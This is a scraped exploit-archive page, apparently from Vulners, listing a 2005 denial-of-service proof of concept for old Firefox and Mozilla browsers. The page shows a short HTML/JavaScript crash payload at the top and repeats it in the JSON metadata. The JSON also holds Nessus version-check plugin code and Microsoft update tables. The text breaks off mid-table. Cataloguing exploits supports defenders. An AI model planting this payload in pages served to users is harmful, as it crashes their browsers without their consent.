Search...

Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit

2005-10-17T00:00:00

ID 1337DAY-ID-6047
Type zdt
Reporter Kubbo
Modified 2005-10-17T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            ========================================================================
Mozilla (Firefox &lt;= 1.0.7) (Mozilla &lt;= 1.7.12) Denial of Service Exploit
========================================================================




&lt;!-- Tested on Firefox &lt;= 1.0.7
             Mozilla Browser &lt;= 1.7.12 
                         /str0ke --&gt;

&lt;!-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob. --&gt;

&lt;html&gt;
	&lt;script language="JavaScript"&gt;
		document.write('&lt;link rel="stylesheet" href="http://"&gt;');
	&lt;/script&gt;
&lt;/html&gt;

&lt;!-- Affects Firefox 1.0.7 and below. Adaras ?ron ?r farliga. --&gt;



#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"hash": "1e05a4f99eea0bed46ad34a08673a6ef5a8a351d4874d277a5a4456f230b2495", "id": "1337DAY-ID-6047", "lastseen": "2018-01-06T01:06:02", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cdc2aa401057df1e80c0829fd5fd09a7", "key": "description"}, {"hash": "09c84daf1b21429b11a4530907a1b8d6", "key": "href"}, {"hash": "06f4b261c0e5bd7500f473dbfef02e59", "key": "modified"}, {"hash": "06f4b261c0e5bd7500f473dbfef02e59", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "04701716a4e73b08cc9625c0efee3304", "key": "reporter"}, {"hash": "4b47867d21a279b1bd30da2ef4d4eb6d", "key": "sourceData"}, {"hash": "126003aef7760504b5eef4d2fc171cdf", "key": "sourceHref"}, {"hash": "fa84a8e7cfabbce0de5bf35ae69c4c6d", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.8, "vector": "NONE", "modified": "2018-01-06T01:06:02"}, "dependencies": {"references": [{"type": "nessus", "idList": ["GOOGLE_CHROME_64_0_3282_119.NASL", "SMB_NT_MS15-106.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14734", "SECURITYVULNS:VULN:6047", "SECURITYVULNS:DOC:6047", "SECURITYVULNS:VULN:3598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805761"]}, {"type": "kaspersky", "idList": ["KLA10677"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SAP/SAP_SOAP_RFC_SXPG_COMMAND_EXEC", "MSF:AUXILIARY/SCANNER/PCANYWHERE/PCANYWHERE_UDP", "MSF:AUXILIARY/SCANNER/PORTSCAN/SYN"]}], "modified": "2018-01-06T01:06:02"}, "vulnersScore": 1.8}, "type": "zdt", "sourceHref": "https://0day.today/exploit/6047", "description": "Exploit for multiple platform in category dos / poc", "title": "Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit", "history": [{"bulletin": {"hash": "81bbe3e2ba6455cb2492b1ab927afc053a127da621cb826cb45174234c094c3f", "id": "1337DAY-ID-6047", "lastseen": "2016-04-20T01:31:11", "enchantments": {"score": {"value": 1.2, "modified": "2016-04-20T01:31:11"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "63392ae5a001f18c69b0f3984a7e8a72", "key": "sourceHref"}, {"hash": "e969eb7333a6c5035a5adb38196d20b6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "06f4b261c0e5bd7500f473dbfef02e59", "key": "published"}, {"hash": "fa84a8e7cfabbce0de5bf35ae69c4c6d", "key": "title"}, {"hash": "7e3faf007156802b78deac6a7091baf7", "key": "sourceData"}, {"hash": "04701716a4e73b08cc9625c0efee3304", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "06f4b261c0e5bd7500f473dbfef02e59", "key": "modified"}, {"hash": "cdc2aa401057df1e80c0829fd5fd09a7", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/6047", "description": "Exploit for multiple platform in category dos / poc", "viewCount": 0, "title": "Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "========================================================================\r\nMozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit\r\n========================================================================\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<html>\r\n\t<script language=\"JavaScript\">\r\n\t\tdocument.write('<link rel=\"stylesheet\" href=\"http://\">');\r\n\t</script>\r\n</html>\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2005-10-17T00:00:00", "references": [], "reporter": "Kubbo", "modified": "2005-10-17T00:00:00", "href": "http://0day.today/exploit/description/6047"}, "lastseen": "2016-04-20T01:31:11", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "========================================================================\r\nMozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit\r\n========================================================================\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<html>\r\n\t<script language=\"JavaScript\">\r\n\t\tdocument.write('<link rel=\"stylesheet\" href=\"http://\">');\r\n\t</script>\r\n</html>\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2005-10-17T00:00:00", "references": [], "reporter": "Kubbo", "modified": "2005-10-17T00:00:00", "href": "https://0day.today/exploit/description/6047"}

{"nessus": [{"lastseen": "2019-11-09T10:47:53", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 64.0.3282.119. It is, therefore, affected by multiple\nsecurity vulnerabilities as noted in Chrome stable channel update\nrelease notes for January 24th, 2018. Please refer to the\nrelease notes for additional information.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application", "modified": "2019-11-02T00:00:00", "id": "GOOGLE_CHROME_64_0_3282_119.NASL", "href": "https://www.tenable.com/plugins/nessus/106485", "published": "2018-01-30T00:00:00", "title": "Google Chrome < 64.0.3282.119 Multiple Vulnerabilities (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106485);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-5715\",\n \"CVE-2017-5753\",\n \"CVE-2017-15420\",\n \"CVE-2018-6031\",\n \"CVE-2018-6032\",\n \"CVE-2018-6033\",\n \"CVE-2018-6034\",\n \"CVE-2018-6035\",\n \"CVE-2018-6036\",\n \"CVE-2018-6037\",\n \"CVE-2018-6038\",\n \"CVE-2018-6039\",\n \"CVE-2018-6040\",\n \"CVE-2018-6041\",\n \"CVE-2018-6042\",\n \"CVE-2018-6043\",\n \"CVE-2018-6045\",\n \"CVE-2018-6046\",\n \"CVE-2018-6047\",\n \"CVE-2018-6048\",\n \"CVE-2018-6049\",\n \"CVE-2018-6050\",\n \"CVE-2018-6051\",\n \"CVE-2018-6052\",\n \"CVE-2018-6053\",\n \"CVE-2018-6054\"\n );\n script_bugtraq_id(102098);\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"Google Chrome < 64.0.3282.119 Multiple Vulnerabilities (Spectre)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple security vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 64.0.3282.119. It is, therefore, affected by multiple\nsecurity vulnerabilities as noted in Chrome stable channel update\nrelease notes for January 24th, 2018. Please refer to the\nrelease notes for additional information.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2018/01/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?26e44d0b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://spectreattack.com/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 64.0.3282.119 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-6054\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'64.0.3282.119', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-23T12:35:38", "bulletinFamily": "scanner", "description": "The version of Internet Explorer installed on the remote host is\nmissing Cumulative Security Update 3096441. It is, therefore, affected\nby multiple vulnerabilities, the majority of which are remote code\nexecution vulnerabilities. An unauthenticated, remote attacker can\nexploit these issues by convincing a user to visit a specially crafted\nwebsite, resulting in the execution of arbitrary code in the context\nof the current user.", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS15-106.NASL", "href": "https://www.tenable.com/plugins/nessus/86367", "published": "2015-10-13T00:00:00", "title": "MS15-106: Cumulative Security Update for Internet Explorer (3096441)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86367);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-2482\",\n \"CVE-2015-6042\",\n \"CVE-2015-6044\",\n \"CVE-2015-6045\",\n \"CVE-2015-6046\",\n \"CVE-2015-6047\",\n \"CVE-2015-6048\",\n \"CVE-2015-6049\",\n \"CVE-2015-6050\",\n \"CVE-2015-6051\",\n \"CVE-2015-6052\",\n \"CVE-2015-6053\",\n \"CVE-2015-6055\",\n \"CVE-2015-6056\",\n \"CVE-2015-6059\",\n \"CVE-2015-6184\"\n );\n script_bugtraq_id(\n 76982,\n 76984,\n 76986,\n 76987,\n 76991,\n 76992,\n 76993,\n 76995,\n 77000,\n 77002,\n 77005,\n 77006,\n 77007,\n 77010\n );\n script_xref(name:\"MSFT\", value:\"MS15-106\");\n script_xref(name:\"MSKB\", value:\"3093983\");\n script_xref(name:\"MSKB\", value:\"3105210\");\n\n script_name(english:\"MS15-106: Cumulative Security Update for Internet Explorer (3096441)\");\n script_summary(english:\"Checks the version of mshtml.dll.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Internet Explorer installed on the remote host is\nmissing Cumulative Security Update 3096441. It is, therefore, affected\nby multiple vulnerabilities, the majority of which are remote code\nexecution vulnerabilities. An unauthenticated, remote attacker can\nexploit these issues by convincing a user to visit a specially crafted\nwebsite, resulting in the execution of arbitrary code in the context\nof the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-106\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 8, 2012, 8.1, 2012 R2, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6184\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS15-106';\nkbs = make_list('3093983', '3105210');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10\n hotfix_is_vulnerable(os:\"10\", sp:0, file:\"mshtml.dll\", version:\"11.00.10240.16566\", min_version:\"11.0.10240.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3105210\") ||\n\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18052\", min_version:\"11.0.9600.17000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n\n # Windows 8 / Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.21636\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.17519\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"10.0.9200.21636\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"10.0.9200.17519\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18057\", min_version:\"11.0.9600.17000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n # Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"8.0.7601.23206\", min_version:\"8.0.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"8.0.7601.19003\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"9.0.8112.20823\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"9.0.8112.16708\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n\n # Vista / Windows Server 2008\n # Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"7.0.6002.23798\", min_version:\"7.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"7.0.6002.19488\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n # Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"8.0.6001.23750\", min_version:\"8.0.6001.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"8.0.6001.19690\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.20823\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16708\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3093983\")\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2019-09-11T12:35:42", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage in Internet Explorer.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves several reported vulnerabilities in Internet Explorer. The most severe of these vulnerabilities could allow remote code execution if a user views a specially crafted webpage in Internet Explorer. To learn more about the vulnerabilities, see <a href=\"https://technet.microsoft.com/library/security/ms15-106\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS15-106</a>.<span></span></div><h2>How to obtain and install the update</h2><div class=\"kb-summary-section section\"><h3 class=\"sbody-h3\">Method 1: Microsoft Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\"> This update is available through Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-3\" target=\"_self\">Get security updates automatically</a>. <br/><br/><span class=\"text-base\">Note</span> For Windows RT and Windows RT 8.1, this update is available through Microsoft Update only.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Download Center</h3>You can obtain the stand-alone update package through the Microsoft Download Center. Go to <a href=\"https://technet.microsoft.com/library/security/ms15-106\" id=\"kb-link-4\" target=\"_self\">Microsoft Security Bulletin MS15-106</a> to find the download links for this update.</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues in this security update</h3><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/3119070\" id=\"kb-link-5\">3119070 </a> Internet Explorer 11 consumes high memory and CPU cycles after you install update MS15-106 <br/><br/></li></ul><h3 class=\"sbody-h3\">More information about this security update</h3>The following article contains more information about this security update:<span><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3093983\" id=\"kb-link-6\">3093983 </a> MS15-106: Security update for Internet Explorer: October 13, 2015 </div></span><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">IE8-Windows6.0-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">IE8-Windows6.0-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">IE9-Windows6.0-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">IE9-Windows6.0-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-7\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3093983\" id=\"kb-link-8\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 7 in all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3093983-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">IE8-Windows6.0-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">IE8-Windows6.0-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">IE9-Windows6.0-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 in all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">IE9-Windows6.0-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-9\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a href=\"https://support.microsoft.com/help/3093983\" id=\"kb-link-10\" target=\"_self\">file information</a> section</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference Table</h5>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 8 in all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3093983-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Internet Explorer 9 for all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">IE9-Windows6.1-KB3093983-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td 